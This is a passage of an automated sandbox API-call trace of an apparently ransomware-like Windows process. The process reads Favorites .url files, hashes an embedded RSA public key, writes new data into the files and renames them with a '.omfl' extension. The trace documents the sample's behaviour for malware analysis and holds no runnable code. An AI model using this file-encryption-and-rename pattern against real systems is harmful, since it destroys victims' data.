HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cf168 | out: hHeap=0x4970000) returned 1 [0132.604] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd08cc8 | out: hHeap=0x4970000) returned 1 [0132.604] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e4b90 | out: hHeap=0x4970000) returned 1 [0132.604] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb28 | out: hHeap=0x4970000) returned 1 [0132.604] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0bd00 | out: hHeap=0x4970000) returned 1 [0132.604] WriteFile (in: hFile=0x610, lpBuffer=0xdd14728*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0xe00fb14, lpOverlapped=0x0 | out: lpBuffer=0xdd14728*, lpNumberOfBytesWritten=0xe00fb14*=0x80, lpOverlapped=0x0) returned 1 [0132.604] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd14728 | out: hHeap=0x4970000) returned 1 [0132.604] SetFilePointerEx (in: hFile=0x610, liDistanceToMove=0x85, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.604] WriteFile (in: hFile=0x610, lpBuffer=0xdd24578*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0xdd24578*, lpNumberOfBytesWritten=0xe00fb50*=0x100, lpOverlapped=0x0) returned 1 [0132.604] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd24578 | out: hHeap=0x4970000) returned 1 [0132.605] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5dc0 [0132.605] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x428) returned 0xdd19550 [0132.605] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH", cchWideChar=-1, lpMultiByteStr=0xdd19550, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH", lpUsedDefaultChar=0x0) returned 41 [0132.605] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x430) returned 0x757b548 [0132.605] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd19550 | out: hHeap=0x4970000) returned 1 [0132.605] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf5dc0 | out: hHeap=0x4970000) returned 1 [0132.605] WriteFile (in: hFile=0x610, lpBuffer=0x757b548*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0x757b548*, lpNumberOfBytesWritten=0xe00fb50*=0x28, lpOverlapped=0x0) returned 1 [0132.605] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x757b548 | out: hHeap=0x4970000) returned 1 [0132.605] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0132.605] WriteFile (in: hFile=0x610, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0xe00fb50*=0x26, lpOverlapped=0x0) returned 1 [0132.605] CloseHandle (hObject=0x610) returned 1 [0132.613] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xb0) returned 0x74f82a0 [0132.613] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8b0) returned 0x74fb288 [0132.613] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74f82a0 | out: hHeap=0x4970000) returned 1 [0132.613] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Home.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft at home.url"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Home.url.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft at home.url.omfl")) returned 1 [0132.615] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74fb288 | out: hHeap=0x4970000) returned 1 [0132.616] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0132.616] VirtualFree (lpAddress=0x6ec0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0132.617] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e6bb8 | out: hHeap=0x4970000) returned 1 [0132.617] FindNextFileW (in: hFindFile=0xdce3b70, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft At Work.url", cAlternateFileName="MICROS~2.URL")) returned 1 [0132.617] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d2e68 [0132.617] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xbe) returned 0x74e6bb8 [0132.617] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49d2e68 | out: hHeap=0x4970000) returned 1 [0132.617] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Work.url") returned=".url" [0132.617] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Work.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft at work.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x610 [0132.618] GetFileSizeEx (in: hFile=0x610, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=133) returned 1 [0132.618] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0132.622] SetFilePointerEx (in: hFile=0x610, liDistanceToMove=0x5f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.622] ReadFile (in: hFile=0x610, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0xe00fb78, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb78*=0x26, lpOverlapped=0x0) returned 1 [0132.624] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb60 [0132.624] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0132.625] SetFilePointer (in: hFile=0x610, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.625] ReadFile (in: hFile=0x610, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0xe00fb70, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb70*=0x85, lpOverlapped=0x0) returned 1 [0132.625] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0132.625] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1ef) returned 0xdd0bd00 [0132.625] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0132.625] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0132.625] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d2e68) returned 1 [0132.626] CryptCreateHash (in: hProv=0x49d2e68, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0132.626] CryptHashData (hHash=0xdce37f0, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0132.626] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0132.626] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x11) returned 0x74cdf28 [0132.626] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0132.626] GetLastError () returned 0x0 [0132.627] CryptDestroyHash (hHash=0xdce37f0) returned 1 [0132.627] CryptReleaseContext (hProv=0x49d2e68, dwFlags=0x0) returned 1 [0132.627] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0bd00 | out: hHeap=0x4970000) returned 1 [0132.627] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0132.627] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0132.627] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb28 [0132.627] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0132.627] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0132.627] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb60 [0132.627] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x90) returned 0xdd14728 [0132.627] SetFilePointer (in: hFile=0x610, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0132.627] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb28 | out: hHeap=0x4970000) returned 1 [0132.627] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1f0) returned 0xdd0bd00 [0132.627] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb28 [0132.627] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1f0) returned 0x74e4b90 [0132.627] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x58) returned 0xdd08cc8 [0132.627] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0x49dbcb8 [0132.627] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd17460 [0132.627] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0x49dbd00 [0132.627] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd17478 [0132.627] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd174a8 [0132.627] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd17208 [0132.627] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd174c0 [0132.627] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x24) returned 0xdd0d930 [0132.628] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x158) returned 0xdd27968 [0132.628] RtlReAllocateHeap (Heap=0x4970000, Flags=0x0, Ptr=0xdd27968, Size=0x218) returned 0xdd206b0 [0132.628] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x558) returned 0xdce69c8 [0132.628] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd174a8 | out: hHeap=0x4970000) returned 1 [0132.628] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd174c0 | out: hHeap=0x4970000) returned 1 [0132.628] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17208 | out: hHeap=0x4970000) returned 1 [0132.628] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0d930 | out: hHeap=0x4970000) returned 1 [0132.628] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce69c8 | out: hHeap=0x4970000) returned 1 [0132.628] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd17208 [0132.628] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0x7481e58 [0132.628] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd174c0 [0132.628] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x18) returned 0x74cf168 [0132.628] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x9) returned 0xdd174a8 [0132.628] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0x7481e38 [0132.628] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10e) returned 0x74e3210 [0132.628] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce8f58 [0132.628] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x58) returned 0xdd08ea8 [0132.628] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x14) returned 0x74cdf28 [0132.628] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x104) returned 0x7503670 [0132.628] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x14) returned 0x74cdbc8 [0132.628] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e18 [0132.628] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e3210 | out: hHeap=0x4970000) returned 1 [0132.628] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd174c0 | out: hHeap=0x4970000) returned 1 [0132.628] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e38 | out: hHeap=0x4970000) returned 1 [0132.628] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd174a8 | out: hHeap=0x4970000) returned 1 [0132.628] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cf168 | out: hHeap=0x4970000) returned 1 [0132.628] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e58 | out: hHeap=0x4970000) returned 1 [0132.629] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17208 | out: hHeap=0x4970000) returned 1 [0132.629] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce8f58 | out: hHeap=0x4970000) returned 1 [0132.629] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd08cc8 | out: hHeap=0x4970000) returned 1 [0132.629] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd206b0 | out: hHeap=0x4970000) returned 1 [0132.629] GetCurrentThreadId () returned 0x618 [0132.629] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24578 [0132.629] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x82) returned 0x7579d40 [0132.629] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x2c) returned 0x750ca48 [0132.629] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d2e68 [0132.629] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x148) returned 0xdd17560 [0132.629] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e58 [0132.629] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e38 [0132.629] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24890 [0132.629] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0132.629] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0132.629] GetCurrentThreadId () returned 0x618 [0132.629] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0132.629] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0132.629] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xeb) returned 0x74e3210 [0132.629] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0132.629] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0132.629] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0132.629] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0132.629] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e3210 | out: hHeap=0x4970000) returned 1 [0132.629] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24368 [0132.629] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e58 | out: hHeap=0x4970000) returned 1 [0132.629] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4c) returned 0x757c4e0 [0132.630] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e58 [0132.630] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24260 [0132.630] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e78 [0132.630] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd17208 [0132.630] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e78 | out: hHeap=0x4970000) returned 1 [0132.630] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e78 [0132.630] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e98 [0132.630] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8e0 [0132.630] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8a0 [0132.630] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8b0 [0132.630] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa860 [0132.630] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8c0 [0132.630] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd174a8 [0132.630] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e98 | out: hHeap=0x4970000) returned 1 [0132.630] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0x7481e98 [0132.630] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e78 | out: hHeap=0x4970000) returned 1 [0132.630] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e78 [0132.630] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8f0 [0132.630] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa890 [0132.630] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8d0 [0132.630] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd174c0 [0132.630] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa890 | out: hHeap=0x4970000) returned 1 [0132.630] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x18) returned 0x74cf168 [0132.630] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8f0 | out: hHeap=0x4970000) returned 1 [0132.630] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd17490 [0132.630] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8d0 | out: hHeap=0x4970000) returned 1 [0132.630] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd171d8 [0132.631] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e78 | out: hHeap=0x4970000) returned 1 [0132.631] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0x7481e78 [0132.631] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa860 | out: hHeap=0x4970000) returned 1 [0132.631] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd17178 [0132.631] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e78 | out: hHeap=0x4970000) returned 1 [0132.631] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16968 [0132.631] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8e0 | out: hHeap=0x4970000) returned 1 [0132.631] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd174d8 [0132.631] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17178 | out: hHeap=0x4970000) returned 1 [0132.631] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd17178 [0132.631] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16968 | out: hHeap=0x4970000) returned 1 [0132.631] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0xdcfa8e0 [0132.631] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e58 | out: hHeap=0x4970000) returned 1 [0132.631] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x14) returned 0x74cf128 [0132.631] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8e0 | out: hHeap=0x4970000) returned 1 [0132.631] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1c) returned 0xdce8f58 [0132.631] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd174a8 | out: hHeap=0x4970000) returned 1 [0132.631] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd174a8 [0132.631] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e98 | out: hHeap=0x4970000) returned 1 [0132.631] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x204) returned 0xdd206b0 [0132.631] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17208 | out: hHeap=0x4970000) returned 1 [0132.631] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x108) returned 0x75039b8 [0132.631] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17178 | out: hHeap=0x4970000) returned 1 [0132.631] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x210) returned 0xdce0a50 [0132.631] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce8f58 | out: hHeap=0x4970000) returned 1 [0132.631] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10c) returned 0x74e3210 [0132.631] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8a0 | out: hHeap=0x4970000) returned 1 [0132.631] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x108) returned 0x7503788 [0132.632] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd174a8 | out: hHeap=0x4970000) returned 1 [0132.632] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x200) returned 0xdd06f38 [0132.632] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x75039b8 | out: hHeap=0x4970000) returned 1 [0132.632] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24680 [0132.632] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e38 | out: hHeap=0x4970000) returned 1 [0132.632] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49d2e68 | out: hHeap=0x4970000) returned 1 [0132.632] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd24368 | out: hHeap=0x4970000) returned 1 [0132.632] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd24680 | out: hHeap=0x4970000) returned 1 [0132.632] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cf128 | out: hHeap=0x4970000) returned 1 [0132.632] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7503788 | out: hHeap=0x4970000) returned 1 [0132.632] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce0a50 | out: hHeap=0x4970000) returned 1 [0132.632] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd06f38 | out: hHeap=0x4970000) returned 1 [0132.632] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e3210 | out: hHeap=0x4970000) returned 1 [0132.632] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8b0 | out: hHeap=0x4970000) returned 1 [0132.632] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd174d8 | out: hHeap=0x4970000) returned 1 [0132.632] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, 